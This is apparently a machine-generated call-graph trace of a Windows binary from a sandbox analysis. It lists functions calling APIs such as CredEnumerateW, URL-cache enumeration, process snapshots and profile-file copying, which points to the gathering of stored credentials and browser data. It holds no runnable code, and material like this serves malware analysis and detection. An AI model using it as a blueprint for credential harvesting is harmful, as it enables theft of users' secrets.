4125f8 7 API calls 37921->38124 37923->37919 38093 411ac5 37923->38093 37934 4125da 37933->37934 37935 4125f0 37934->37935 37936 4125e6 DeleteObject 37934->37936 37938 40b1ab free free 37935->37938 37936->37935 37937->37850 37938->37848 37940 40b640 37939->37940 37941 40b639 free 37939->37941 37942 40b1ab free free 37940->37942 37941->37940 37942->37824 37944 40a83b GetSystemDirectoryW 37943->37944 37945 40a84c wcscpy 37943->37945 37944->37945 37950 409719 wcslen 37945->37950 37948 40a881 LoadLibraryW 37949 40a886 37948->37949 37949->37873 37949->37876 37951 409724 37950->37951 37952 409739 wcscat LoadLibraryW 37950->37952 37951->37952 37953 40972c wcscat 37951->37953 37952->37948 37952->37949 37953->37952 37955 444732 37954->37955 37956 444728 DeleteObject 37954->37956 37966 409cc3 37955->37966 37956->37955 37958 412551 37959 4010f9 37958->37959 37960 401130 37959->37960 37961 401134 GetModuleHandleW LoadIconW 37960->37961 37962 401107 wcsncat 37960->37962 37963 40a7be 37961->37963 37962->37960 37964 40a7d2 37963->37964 37964->37888 37964->37964 37965->37885 37969 409bfd memset wcscpy 37966->37969 37968 409cdb CreateFontIndirectW 37968->37958 37969->37968 37970->37897 37972 40aa14 37971->37972 37973 40aa0a free 37971->37973 37972->37903 37973->37972 37975 40a8eb 37974->37975 37976 40a8df wcslen 37974->37976 37977 40a906 free 37975->37977 37978 40a90f 37975->37978 37976->37975 37979 40a919 37977->37979 37980 4099f4 3 API calls 37978->37980 37981 40a932 37979->37981 37982 40a929 free 37979->37982 37980->37979 37984 4099f4 3 API calls 37981->37984 37983 40a93e memcpy 37982->37983 37983->37897 37985 40a93d 37984->37985 37985->37983 37987 409a41 37986->37987 37988 4099fb malloc 37986->37988 37987->37897 37990 409a37 37988->37990 37991 409a1c 37988->37991 37990->37897 37992 409a30 free 37991->37992 37993 409a20 memcpy 37991->37993 37992->37990 37993->37992 37995 40a9e7 37994->37995 37996 40a9dc free 37994->37996 37997 4099f4 3 API calls 37995->37997 37998 40a9f2 37996->37998 37997->37998 37998->37902 38023 409bca GetModuleFileNameW 37999->38023 38001 40dce6 wcsrchr 38002 40dcf5 38001->38002 38003 40dcf9 wcscat 38001->38003 38002->38003 38003->37909 38024 44db70 38004->38024 38008 40dbfd 38027 4447d9 38008->38027 38011 40dc34 wcscpy wcscpy 38053 40d6f5 38011->38053 38012 40dc1f wcscpy 38012->38011 38015 40d6f5 3 API calls 38016 40dc73 38015->38016 38017 40d6f5 3 API calls 38016->38017 38018 40dc89 38017->38018 38019 40d6f5 3 API calls 38018->38019 38020 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38019->38020 38059 40da80 38020->38059 38023->38001 38025 40dbb4 memset memset 38024->38025 38026 409bca GetModuleFileNameW 38025->38026 38026->38008 38028 4447f4 38027->38028 38029 40dc1b 38028->38029 38030 444807 ??2@YAPAXI 38028->38030 38029->38011 38029->38012 38031 44481f 38030->38031 38032 444873 _snwprintf 38031->38032 38033 4448ab wcscpy 38031->38033 38066 44474a 8 API calls 38032->38066 38035 4448bb 38033->38035 38067 44474a 8 API calls 38035->38067 38036 4448a7 38036->38033 38036->38035 38038 4448cd 38068 44474a 8 API calls 38038->38068 38040 4448e2 38069 44474a 8 API calls 38040->38069 38042 4448f7 38070 44474a 8 API calls 38042->38070 38044 44490c 38071 44474a 8 API calls 38044->38071 38046 444921 38072 44474a 8 API calls 38046->38072 38048 444936 38073 44474a 8 API calls 38048->38073 38050 44494b 38074 44474a 8 API calls 38050->38074 38052 444960 ??3@YAXPAX 38052->38029 38054 44db70 38053->38054 38055 40d702 memset GetPrivateProfileStringW 38054->38055 38056 40d752 38055->38056 38057 40d75c WritePrivateProfileStringW 38055->38057 38056->38057 38058 40d758 38056->38058 38057->38058 38058->38015 38060 44db70 38059->38060 38061 40da8d memset 38060->38061 38062 40daac LoadStringW 38061->38062 38065 40dac6 38062->38065 38064 40dade 38064->37838 38065->38062 38065->38064 38075 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38065->38075 38066->38036 38067->38038 38068->38040 38069->38042 38070->38044 38071->38046 38072->38048 38073->38050 38074->38052 38075->38065 38086 409b98 GetFileAttributesW 38076->38086 38078 40daea 38079 40daef wcscpy wcscpy GetPrivateProfileIntW 38078->38079 38085 40db63 38078->38085 38087 40d65d GetPrivateProfileStringW 38079->38087 38081 40db3e 38088 40d65d GetPrivateProfileStringW 38081->38088 38083 40db4f 38089 40d65d GetPrivateProfileStringW 38083->38089 38085->37840 38086->38078 38087->38081 38088->38083 38089->38085 38125 40eaff 38090->38125 38094 411ae2 memset 38093->38094 38095 411b8f 38093->38095 38165 409bca GetModuleFileNameW 38094->38165 38107 411a8b 38095->38107 38097 411b0a wcsrchr 38098 411b22 wcscat 38097->38098 38099 411b1f 38097->38099 38166 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38098->38166 38099->38098 38101 411b67 38167 402afb 38101->38167 38105 411b7f 38223 40ea13 SendMessageW memset SendMessageW 38105->38223 38108 402afb 27 API calls 38107->38108 38109 411ac0 38108->38109 38110 4110dc 38109->38110 38111 41113e 38110->38111 38116 4110f0 38110->38116 38248 40969c LoadCursorW SetCursor 38111->38248 38113 411143 38249 4032b4 38113->38249 38267 444a54 38113->38267 38114 4110f7 _wcsicmp 38114->38116 38115 411157 38117 40ada2 _wcsicmp 38115->38117 38116->38111 38116->38114 38270 410c46 10 API calls 38116->38270 38120 411167 38117->38120 38118 4111af 38120->38118 38121 4111a6 qsort 38120->38121 38121->38118 38124->37921 38126 40eb10 38125->38126 38138 40e8e0 38126->38138 38129 40eb6c memcpy memcpy 38130 40ebb7 38129->38130 38130->38129 38131 40ebf2 ??2@YAPAXI ??2@YAPAXI 38130->38131 38133 40d134 16 API calls 38130->38133 38132 40ec65 38131->38132 38134 40ec2e ??2@YAPAXI 38131->38134 38148 40ea7f 38132->38148 38133->38130 38134->38132 38137 402f49 38137->37921 38139 40e8f2 38138->38139 38140 40e8eb ??3@YAXPAX 38138->38140 38141 40e900 38139->38141 38142 40e8f9 ??3@YAXPAX 38139->38142 38140->38139 38143 40e911 38141->38143 38144 40e90a ??3@YAXPAX 38141->38144 38142->38141 38145 40e931 ??2@YAPAXI ??2@YAPAXI 38143->38145 38146 40e921 ??3@YAXPAX 38143->38146 38147 40e92a ??3@YAXPAX 38143->38147 38144->38143 38145->38129 38146->38147 38147->38145 38149 40aa04 free 38148->38149 38150 40ea88 38149->38150 38151 40aa04 free 38150->38151 38152 40ea90 38151->38152 38153 40aa04 free 38152->38153 38154 40ea98 38153->38154 38155 40aa04 free 38154->38155 38156 40eaa0 38155->38156 38157 40a9ce 4 API calls 38156->38157 38158 40eab3 38157->38158 38159 40a9ce 4 API calls 38158->38159 38160 40eabd 38159->38160 38161 40a9ce 4 API calls 38160->38161 38162 40eac7 38161->38162 38163 40a9ce 4 API calls 38162->38163 38164 40ead1 38163->38164 38164->38137 38165->38097 38166->38101 38224 40b2cc 38167->38224 38169 402b0a 38170 40b2cc 27 API calls 38169->38170 38171 402b23 38170->38171 38172 40b2cc 27 API calls 38171->38172 38173 402b3a 38172->38173 38174 40b2cc 27 API calls 38173->38174 38175 402b54 38174->38175 38176 40b2cc 27 API calls 38175->38176 38177 402b6b 38176->38177 38178 40b2cc 27 API calls 38177->38178 38179 402b82 38178->38179 38180 40b2cc 27 API calls 38179->38180 38181 402b99 38180->38181 38182 40b2cc 27 API calls 38181->38182 38183 402bb0 38182->38183 38184 40b2cc 27 API calls 38183->38184 38185 402bc7 38184->38185 38186 40b2cc 27 API calls 38185->38186 38187 402bde 38186->38187 38188 40b2cc 27 API calls 38187->38188 38189 402bf5 38188->38189 38190 40b2cc 27 API calls 38189->38190 38191 402c0c 38190->38191 38192 40b2cc 27 API calls 38191->38192 38193 402c23 38192->38193 38194 40b2cc 27 API calls 38193->38194 38195 402c3a 38194->38195 38196 40b2cc 27 API calls 38195->38196 38197 402c51 38196->38197 38198 40b2cc 27 API calls 38197->38198 38199 402c68 38198->38199 38200 40b2cc 27 API calls 38199->38200 38201 402c7f 38200->38201 38202 40b2cc 27 API calls 38201->38202 38203 402c99 38202->38203 38204 40b2cc 27 API calls 38203->38204 38205 402cb3 38204->38205 38206 40b2cc 27 API calls 38205->38206 38207 402cd5 38206->38207 38208 40b2cc 27 API calls 38207->38208 38209 402cf0 38208->38209 38210 40b2cc 27 API calls 38209->38210 38211 402d0b 38210->38211 38212 40b2cc 27 API calls 38211->38212 38213 402d26 38212->38213 38214 40b2cc 27 API calls 38213->38214 38215 402d3e 38214->38215 38216 40b2cc 27 API calls 38215->38216 38217 402d59 38216->38217 38218 40b2cc 27 API calls 38217->38218 38219 402d78 38218->38219 38220 40b2cc 27 API calls 38219->38220 38221 402d93 38220->38221 38222 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38221->38222 38222->38105 38223->38095 38227 40b58d 38224->38227 38226 40b2d1 38226->38169 38228 40b5a4 GetModuleHandleW FindResourceW 38227->38228 38229 40b62e 38227->38229 38230 40b5c2 LoadResource 38228->38230 38232 40b5e7 38228->38232 38229->38226 38231 40b5d0 SizeofResource LockResource 38230->38231 38230->38232 38231->38232 38232->38229 38240 40afcf 38232->38240 38234 40b608 memcpy 38243 40b4d3 memcpy 38234->38243 38236 40b61e 38244 40b3c1 18 API calls 38236->38244 38238 40b626 38245 40b04b 38238->38245 38241 40b04b ??3@YAXPAX 38240->38241 38242 40afd7 ??2@YAPAXI 38241->38242 38242->38234 38243->38236 38244->38238 38246 40b051 ??3@YAXPAX 38245->38246 38247 40b05f 38245->38247 38246->38247 38247->38229 38248->38113 38250 4032c4 38249->38250 38251 40b633 free 38250->38251 38252 403316 38251->38252 38271 44553b 38252->38271 38256 403480 38469 40368c 15 API calls 38256->38469 38258 403489 38259 40b633 free 38258->38259 38261 403495 38259->38261 38260 40333c 38260->38256 38262 4033a9 memset memcpy 38260->38262 38263 4033ec wcscmp 38260->38263 38467 4028e7 11 API calls 38260->38467 38468 40f508 6 API calls 38260->38468 38261->38115 38262->38260 38262->38263 38263->38260 38266 403421 _wcsicmp 38266->38260 38268 444a64 FreeLibrary 38267->38268 38269 444a83 38267->38269 38268->38269 38269->38115 38270->38116 38272 445548 38271->38272 38273 445599 38272->38273 38470 40c768 38272->38470 38274 4455a8 memset 38273->38274 38281 4457f2 38273->38281 38553 403988 38274->38553 38284 445854 38281->38284 38656 403e2d memset memset memset memset memset 38281->38656 38282 4455e5 38293 445672 38282->38293 38298 44560f 38282->38298 38283 4458bb memset memset 38286 414c2e 17 API calls 38283->38286 38337 4458aa 38284->38337 38679 403c9c memset memset memset memset memset 38284->38679 38289 4458f9 38286->38289 38288 44595e memset memset 38296 414c2e 17 API calls 38288->38296 38297 40b2cc 27 API calls 38289->38297 38291 44558c 38537 444b06 38291->38537 38292 44557a 38292->38291 38752 4136c0 CoTaskMemFree 38292->38752 38564 403fbe memset memset memset memset memset 38293->38564 38294 445a00 memset memset 38702 414c2e 38294->38702 38295 445b22 38301 445bca 38295->38301 38302 445b38 memset memset memset 38295->38302 38306 44599c 38296->38306 38308 445909 38297->38308 38310 4087b3 338 API calls 38298->38310 38300 445849 38768 40b1ab free free 38300->38768 38309 445c8b memset memset 38301->38309 38375 445cf0 38301->38375 38313 445bd4 38302->38313 38314 445b98 38302->38314 38307 40b2cc 27 API calls 38306->38307 38321 4459ac 38307->38321 38318 409d1f 6 API calls 38308->38318 38322 414c2e 17 API calls 38309->38322 38319 445621 38310->38319 38311 44589f 38769 40b1ab free free 38311->38769 38312 445585 38753 41366b FreeLibrary 38312->38753 38328 414c2e 17 API calls 38313->38328 38314->38313 38324 445ba2 38314->38324 38317 403335 38466 4452e5 45 API calls 38317->38466 38332 445919 38318->38332 38754 4454bf 20 API calls 38319->38754 38320 445823 38320->38300 38342 4087b3 338 API calls 38320->38342 38333 409d1f 6 API calls 38321->38333 38334 445cc9 38322->38334 38841 4099c6 wcslen 38324->38841 38325 4456b2 38756 40b1ab free free 38325->38756 38327 40b2cc 27 API calls 38338 445a4f 38327->38338 38329 445be2 38328->38329 38340 40b2cc 27 API calls 38329->38340 38330 445d3d 38360 40b2cc 27 API calls 38330->38360 38331 445d88 memset memset memset 38343 414c2e 17 API calls 38331->38343 38770 409b98 GetFileAttributesW 38332->38770 38344 4459bc 38333->38344 38345 409d1f 6 API calls 38334->38345 38335 445879 38335->38311 38356 4087b3 338 API calls 38335->38356 38337->38283 38361 44594a 38337->38361 38718 409d1f wcslen wcslen 38338->38718 38350 445bf3 38340->38350 38342->38320 38353 445dde 38343->38353 38837 409b98 GetFileAttributesW 38344->38837 38355 445ce1 38345->38355 38346 445bb3 38844 445403 memset 38346->38844 38347 445680 38347->38325 38587 4087b3 memset 38347->38587 38359 409d1f 6 API calls 38350->38359 38351 445928 38351->38361 38771 40b6ef 38351->38771 38362 40b2cc 27 API calls 38353->38362 38861 409b98 GetFileAttributesW 38355->38861 38356->38335 38358 40b2cc 27 API calls 38367 445a94 38358->38367 38369 445c07 38359->38369 38370 445d54 _wcsicmp 38360->38370 38361->38288 38374 4459ed 38361->38374 38373 445def 38362->38373 38363 4459cb 38363->38374 38383 40b6ef 253 API calls 38363->38383 38723 40ae18 38367->38723 38368 44566d 38368->38281 38638 413d4c 38368->38638 38379 445389 259 API calls 38369->38379 38380 445d71 38370->38380 38443 445d67 38370->38443 38372 445665 38755 40b1ab free free 38372->38755 38381 409d1f 6 API calls 38373->38381 38374->38294 38374->38295 38375->38317 38375->38330 38375->38331 38376 445389 259 API calls 38376->38301 38385 445c17 38379->38385 38862 445093 23 API calls 38380->38862 38388 445e03 38381->38388 38383->38374 38384 4456d8 38390 40b2cc 27 API calls 38384->38390 38391 40b2cc 27 API calls 38385->38391 38387 44563c 38387->38372 38393 4087b3 338 API calls 38387->38393 38863 409b98 GetFileAttributesW 38388->38863 38389 40b6ef 253 API calls 38389->38317 38395 4456e2 38390->38395 38396 445c23 38391->38396 38392 445d83 38392->38317 38393->38387 38757 413fa6 _wcsicmp _wcsicmp 38395->38757 38400 409d1f 6 API calls 38396->38400 38398 445e12 38405 445e6b 38398->38405 38412 40b2cc 27 API calls 38398->38412 38403 445c37 38400->38403 38401 445aa1 38404 445b17 38401->38404 38419 445ab2 memset 38401->38419 38432 409d1f 6 API calls 38401->38432 38730 40add4 38401->38730 38735 445389 38401->38735 38744 40ae51 38401->38744 38402 4456eb 38408 4456fd memset memset memset memset 38402->38408 38409 4457ea 38402->38409 38410 445389 259 API calls 38403->38410 38838 40aebe 38404->38838 38865 445093 23 API calls 38405->38865 38758 409c70 wcscpy wcsrchr 38408->38758 38761 413d29 38409->38761 38415 445c47 38410->38415 38416 445e33 38412->38416 38413 445e7e 38418 445f67 38413->38418 38421 40b2cc 27 API calls 38415->38421 38422 409d1f 6 API calls 38416->38422 38427 40b2cc 27 API calls 38418->38427 38423 40b2cc 27 API calls 38419->38423 38425 445c53 38421->38425 38426 445e47 38422->38426 38423->38401 38424 409c70 2 API calls 38428 44577e 38424->38428 38429 409d1f 6 API calls 38425->38429 38864 409b98 GetFileAttributesW 38426->38864 38431 445f73 38427->38431 38433 409c70 2 API calls 38428->38433 38434 445c67 38429->38434 38436 409d1f 6 API calls 38431->38436 38432->38401 38437 44578d 38433->38437 38438 445389 259 API calls 38434->38438 38435 445e56 38435->38405 38441 445e83 memset 38435->38441 38439 445f87 38436->38439 38437->38409 38445 40b2cc 27 API calls 38437->38445 38438->38301 38868 409b98 GetFileAttributesW 38439->38868 38444 40b2cc 27 API calls 38441->38444 38443->38317 38443->38389 38446 445eab 38444->38446 38447 4457a8 38445->38447 38448 409d1f 6 API calls 38446->38448 38449 409d1f 6 API calls 38447->38449 38450 445ebf 38448->38450 38451 4457b8 38449->38451 38452 40ae18 9 API calls 38450->38452 38760 409b98 GetFileAttributesW 38451->38760 38462 445ef5 38452->38462 38454 4457c7 38454->38409 38456 4087b3 338 API calls 38454->38456 38455 40ae51 9 API calls 38455->38462 38456->38409 38457 445f5c 38459 40aebe FindClose 38457->38459 38458 40add4 2 API calls 38458->38462 38459->38418 38460 40b2cc 27 API calls 38460->38462 38461 409d1f 6 API calls 38461->38462 38462->38455 38462->38457 38462->38458 38462->38460 38462->38461 38464 445f3a 38462->38464 38866 409b98 GetFileAttributesW 38462->38866 38867 445093 23 API calls 38464->38867 38466->38260 38467->38266 38468->38260 38469->38258 38471 40c775 38470->38471 38869 40b1ab free free 38471->38869 38473 40c788 38870 40b1ab free free 38473->38870 38475 40c790 38871 40b1ab free free 38475->38871 38477 40c798 38478 40aa04 free 38477->38478 38479 40c7a0 38478->38479 38872 40c274 memset 38479->38872 38484 40a8ab 9 API calls 38485 40c7c3 38484->38485 38486 40a8ab 9 API calls 38485->38486 38487 40c7d0 38486->38487 38901 40c3c3 38487->38901 38491 40c877 38500 40bdb0 38491->38500 38492 40c86c 38943 4053fe 39 API calls 38492->38943 38498 40c7e5 38498->38491 38498->38492 38499 40c634 50 API calls 38498->38499 38926 40a706 38498->38926 38499->38498 39206 404363 38500->39206 38503 40bf5d 39226 40440c 38503->39226 38504 40bdee 38504->38503 38508 40b2cc 27 API calls 38504->38508 38505 40bddf CredEnumerateW 38505->38504 38509 40be02 wcslen 38508->38509 38509->38503 38516 40be1e 38509->38516 38510 40be26 wcsncmp 38510->38516 38513 40be7d memset 38514 40bea7 memcpy 38513->38514 38513->38516 38515 40bf11 wcschr 38514->38515 38514->38516 38515->38516 38516->38503 38516->38510 38516->38513 38516->38514 38516->38515 38517 40b2cc 27 API calls 38516->38517 38519 40bf43 LocalFree 38516->38519 39229 40bd5d 28 API calls 38516->39229 39230 404423 38516->39230 38518 40bef6 _wcsnicmp 38517->38518 38518->38515 38518->38516 38519->38516 38520 4135f7 39245 4135e0 38520->39245 38523 40b2cc 27 API calls 38524 41360d 38523->38524 38525 40a804 8 API calls 38524->38525 38526 413613 38525->38526 38527 41361b 38526->38527 38528 41363e 38526->38528 38529 40b273 27 API calls 38527->38529 38530 4135e0 FreeLibrary 38528->38530 38531 413625 GetProcAddress 38529->38531 38532 413643 38530->38532 38531->38528 38533 413648 38531->38533 38532->38292 38534 413658 38533->38534 38535 4135e0 FreeLibrary 38533->38535 38534->38292 38536 413666 38535->38536 38536->38292 39248 4449b9 38537->39248 38540 444c1f 38540->38273 38541 4449b9 42 API calls 38543 444b4b 38541->38543 38542 444c15 38545 4449b9 42 API calls 38542->38545 38543->38542 39269 444972 GetVersionExW 38543->39269 38545->38540 38546 444b99 memcmp 38551 444b8c 38546->38551 38547 444c0b 39273 444a85 42 API calls 38547->39273 38551->38546 38551->38547 39270 444aa5 42 API calls 38551->39270 39271 40a7a0 GetVersionExW 38551->39271 39272 444a85 42 API calls 38551->39272 38554 40399d 38553->38554 39274 403a16 38554->39274 38556 403a09 39288 40b1ab free free 38556->39288 38558 403a12 wcsrchr 38558->38282 38559 4039a3 38559->38556 38562 4039f4 38559->38562 39285 40a02c CreateFileW 38559->39285 38562->38556 38563 4099c6 2 API calls 38562->38563 38563->38556 38565 414c2e 17 API calls 38564->38565 38566 404048 38565->38566 38567 414c2e 17 API calls 38566->38567 38568 404056 38567->38568 38569 409d1f 6 API calls 38568->38569 38570 404073 38569->38570 38571 409d1f 6 API calls 38570->38571 38572 40408e 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 4040a6 38573->38574 38575 403af5 20 API calls 38574->38575 38576 4040ba 38575->38576 38577 403af5 20 API calls 38576->38577 38578 4040cb 38577->38578 39315 40414f memset 38578->39315 38580 404140 39329 40b1ab free free 38580->39329 38581 4040ec memset 38585 4040e0 38581->38585 38583 404148 38583->38347 38584 4099c6 2 API calls 38584->38585 38585->38580 38585->38581 38585->38584 38586 40a8ab 9 API calls 38585->38586 38586->38585 39342 40a6e6 WideCharToMultiByte 38587->39342 38589 4087ed 39343 4095d9 memset 38589->39343 38592 408809 memset memset memset memset memset 38593 40b2cc 27 API calls 38592->38593 38594 4088a1 38593->38594 38595 409d1f 6 API calls 38594->38595 38596 4088b1 38595->38596 38597 40b2cc 27 API calls 38596->38597 38598 4088c0 38597->38598 38599 409d1f 6 API calls 38598->38599 38600 4088d0 38599->38600 38601 40b2cc 27 API calls 38600->38601 38602 4088df 38601->38602 38603 409d1f 6 API calls 38602->38603 38604 4088ef 38603->38604 38605 40b2cc 27 API calls 38604->38605 38606 4088fe 38605->38606 38607 409d1f 6 API calls 38606->38607 38608 40890e 38607->38608 38609 40b2cc 27 API calls 38608->38609 38610 40891d 38609->38610 38611 409d1f 6 API calls 38610->38611 38612 40892d 38611->38612 39362 409b98 GetFileAttributesW 38612->39362 38614 40893e 38619 408953 38619->38347 38639 40b633 free 38638->38639 38640 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38639->38640 38641 413f00 Process32NextW 38640->38641 38642 413da5 OpenProcess 38641->38642 38643 413f17 CloseHandle 38641->38643 38644 413eb0 38642->38644 38645 413df3 memset 38642->38645 38643->38384 38644->38641 38647 413ebf free 38644->38647 38648 4099f4 3 API calls 38644->38648 39786 413f27 38645->39786 38647->38644 38648->38644 38649 413e1f 38650 413e37 GetModuleHandleW 38649->38650 38653 413e6a QueryFullProcessImageNameW 38649->38653 39791 413959 38649->39791 39807 413ca4 38649->39807 38650->38649 38652 413e46 GetProcAddress 38650->38652 38652->38649 38653->38649 38655 413ea2 CloseHandle 38655->38644 38657 414c2e 17 API calls 38656->38657 38658 403eb7 38657->38658 38659 414c2e 17 API calls 38658->38659 38660 403ec5 38659->38660 38661 409d1f 6 API calls 38660->38661 38662 403ee2 38661->38662 38663 409d1f 6 API calls 38662->38663 38664 403efd 38663->38664 38665 409d1f 6 API calls 38664->38665 38666 403f15 38665->38666 38667 403af5 20 API calls 38666->38667 38668 403f29 38667->38668 38669 403af5 20 API calls 38668->38669 38670 403f3a 38669->38670 38671 40414f 33 API calls 38670->38671 38677 403f4f 38671->38677 38672 403faf 39821 40b1ab free free 38672->39821 38674 403f5b memset 38674->38677 38675 403fb7 38675->38320 38676 4099c6 2 API calls 38676->38677 38677->38672 38677->38674 38677->38676 38678 40a8ab 9 API calls 38677->38678 38678->38677 38680 414c2e 17 API calls 38679->38680 38681 403d26 38680->38681 38682 414c2e 17 API calls 38681->38682 38683 403d34 38682->38683 38684 409d1f 6 API calls 38683->38684 38685 403d51 38684->38685 38686 409d1f 6 API calls 38685->38686 38687 403d6c 38686->38687 38688 409d1f 6 API calls 38687->38688 38689 403d84 38688->38689 38690 403af5 20 API calls 38689->38690 38691 403d98 38690->38691 38692 403af5 20 API calls 38691->38692 38693 403da9 38692->38693 38694 40414f 33 API calls 38693->38694 38695 403dbe 38694->38695 38696 403e1e 38695->38696 38698 403dca memset 38695->38698 38700 4099c6 2 API calls 38695->38700 38701 40a8ab 9 API calls 38695->38701 39822 40b1ab free free 38696->39822 38698->38695 38699 403e26 38699->38335 38700->38695 38701->38695 38703 414b81 9 API calls 38702->38703 38705 414c40 38703->38705 38704 414c73 memset 38707 414c94 38704->38707 38705->38704 39823 409cea 38705->39823 39826 414592 RegOpenKeyExW 38707->39826 38710 414c64 SHGetSpecialFolderPathW 38712 414d0b 38710->38712 38711 414cc1 38713 414cf4 wcscpy 38711->38713 39827 414bb0 wcscpy 38711->39827 38712->38327 38713->38712 38715 414cd2 39828 4145ac RegQueryValueExW 38715->39828 38717 414ce9 RegCloseKey 38717->38713 38719 409d62 38718->38719 38720 409d43 wcscpy 38718->38720 38719->38358 38721 409719 2 API calls 38720->38721 38722 409d51 wcscat 38721->38722 38722->38719 38724 40aebe FindClose 38723->38724 38725 40ae21 38724->38725 38726 4099c6 2 API calls 38725->38726 38727 40ae35 38726->38727 38728 409d1f 6 API calls 38727->38728 38729 40ae49 38728->38729 38729->38401 38731 40ade0 38730->38731 38734 40ae0f 38730->38734 38732 40ade7 wcscmp 38731->38732 38731->38734 38733 40adfe wcscmp 38732->38733 38732->38734 38733->38734 38734->38401 38736 40ae18 9 API calls 38735->38736 38737 4453c4 38736->38737 38738 40ae51 9 API calls 38737->38738 38739 4453f3 38737->38739 38740 40add4 2 API calls 38737->38740 38743 445403 254 API calls 38737->38743 38738->38737 38741 40aebe FindClose 38739->38741 38740->38737 38742 4453fe 38741->38742 38742->38401 38743->38737 38745 40ae7b FindNextFileW 38744->38745 38746 40ae5c FindFirstFileW 38744->38746 38747 40ae94 38745->38747 38748 40ae8f 38745->38748 38746->38747 38750 40aeb6 38747->38750 38751 409d1f 6 API calls 38747->38751 38749 40aebe FindClose 38748->38749 38749->38747 38750->38401 38751->38750 38752->38312 38753->38291 38754->38387 38755->38368 38756->38368 38757->38402 38759 409c89 38758->38759 38759->38424 38760->38454 38762 413d39 38761->38762 38763 413d2f FreeLibrary 38761->38763 38764 40b633 free 38762->38764 38763->38762 38765 413d42 38764->38765 38766 40b633 free 38765->38766 38767 413d4a 38766->38767 38767->38281 38768->38284 38769->38337 38770->38351 38772 44db70 38771->38772 38773 40b6fc memset 38772->38773 38774 409c70 2 API calls 38773->38774 38775 40b732 wcsrchr 38774->38775 38776 40b743 38775->38776 38777 40b746 memset 38775->38777 38776->38777 38778 40b2cc 27 API calls 38777->38778 38779 40b76f 38778->38779 38780 409d1f 6 API calls 38779->38780 38781 40b783 38780->38781 39829 409b98 GetFileAttributesW 38781->39829 38783 40b792 38784 40b7c2 38783->38784 38785 409c70 2 API calls 38783->38785 39830 40bb98 38784->39830 38787 40b7a5 38785->38787 38789 40b2cc 27 API calls 38787->38789 38793 40b7b2 38789->38793 38790 40b837 CloseHandle 38792 40b83e memset 38790->38792 38791 40b817 38794 409a45 3 API calls 38791->38794 39863 40a6e6 WideCharToMultiByte 38792->39863 38796 409d1f 6 API calls 38793->38796 38797 40b827 CopyFileW 38794->38797 38796->38784 38797->38792 38798 40b866 38799 444432 121 API calls 38798->38799 38800 40b879 38799->38800 38801 40bad5 38800->38801 38802 40b273 27 API calls 38800->38802 38803 40baeb 38801->38803 38804 40bade DeleteFileW 38801->38804 38805 40b89a 38802->38805 38806 40b04b ??3@YAXPAX 38803->38806 38804->38803 38807 438552 134 API calls 38805->38807 38808 40baf3 38806->38808 38809 40b8a4 38807->38809 38808->38361 38810 40bacd 38809->38810 38812 4251c4 137 API calls 38809->38812 38811 443d90 111 API calls 38810->38811 38811->38801 38835 40b8b8 38812->38835 38813 40bac6 39873 424f26 123 API calls 38813->39873 38814 40b8bd memset 39864 425413 17 API calls 38814->39864 38817 425413 17 API calls 38817->38835 38820 40a71b MultiByteToWideChar 38820->38835 38821 40a734 MultiByteToWideChar 38821->38835 38824 40b9b5 memcmp 38824->38835 38825 4099c6 2 API calls 38825->38835 38826 404423 38 API calls 38826->38835 38829 40bb3e memset memcpy 39874 40a734 MultiByteToWideChar 38829->39874 38830 4251c4 137 API calls 38830->38835 38832 40bb88 LocalFree 38832->38835 38835->38813 38835->38814 38835->38817 38835->38820 38835->38821 38835->38824 38835->38825 38835->38826 38835->38829 38835->38830 38836 40ba5f memcmp 38835->38836 39865 4253ef 16 API calls 38835->39865 39866 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38835->39866 39867 4253af 17 API calls 38835->39867 39868 4253cf 17 API calls 38835->39868 39869 447280 memset 38835->39869 39870 447960 memset memcpy memcpy memcpy 38835->39870 39871 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38835->39871 39872 447920 memcpy memcpy memcpy 38835->39872 38836->38835 38837->38363 38839 40aed1 38838->38839 38840 40aec7 FindClose 38838->38840 38839->38295 38840->38839 38842 4099d7 38841->38842 38843 4099da memcpy 38841->38843 38842->38843 38843->38346 38845 40b2cc 27 API calls 38844->38845 38846 44543f 38845->38846 38847 409d1f 6 API calls 38846->38847 38848 44544f 38847->38848 39958 409b98 GetFileAttributesW 38848->39958 38850 44545e 38851 445476 38850->38851 38852 40b6ef 253 API calls 38850->38852 38853 40b2cc 27 API calls 38851->38853 38852->38851 38854 445482 38853->38854 38855 409d1f 6 API calls 38854->38855 38856 445492 38855->38856 39959 409b98 GetFileAttributesW 38856->39959 38858 4454a1 38859 4454b9 38858->38859 38860 40b6ef 253 API calls 38858->38860 38859->38376 38860->38859 38861->38375 38862->38392 38863->38398 38864->38435 38865->38413 38866->38462 38867->38462 38868->38443 38869->38473 38870->38475 38871->38477 38873 414c2e 17 API calls 38872->38873 38874 40c2ae 38873->38874 38944 40c1d3 38874->38944 38879 40c3be 38896 40a8ab 38879->38896 38880 40afcf 2 API calls 38881 40c2fd FindFirstUrlCacheEntryW 38880->38881 38882 40c3b6 38881->38882 38883 40c31e wcschr 38881->38883 38884 40b04b ??3@YAXPAX 38882->38884 38885 40c331 38883->38885 38886 40c35e FindNextUrlCacheEntryW 38883->38886 38884->38879 38888 40a8ab 9 API calls 38885->38888 38886->38883 38887 40c373 GetLastError 38886->38887 38889 40c3ad FindCloseUrlCache 38887->38889 38890 40c37e 38887->38890 38891 40c33e wcschr 38888->38891 38889->38882 38892 40afcf 2 API calls 38890->38892 38891->38886 38893 40c34f 38891->38893 38894 40c391 FindNextUrlCacheEntryW 38892->38894 38895 40a8ab 9 API calls 38893->38895 38894->38883 38894->38889 38895->38886 39133 40a97a 38896->39133 38899 40a8cc 38899->38484 38900 40a8d0 7 API calls 38900->38899 39138 40b1ab free free 38901->39138 38903 40c3dd 38904 40b2cc 27 API calls 38903->38904 38905 40c3e7 38904->38905 39139 414592 RegOpenKeyExW 38905->39139 38907 40c3f4 38908 40c50e 38907->38908 38909 40c3ff 38907->38909 38923 405337 38908->38923 38910 40a9ce 4 API calls 38909->38910 38911 40c418 memset 38910->38911 39140 40aa1d 38911->39140 38914 40c471 38916 40c47a _wcsupr 38914->38916 38915 40c505 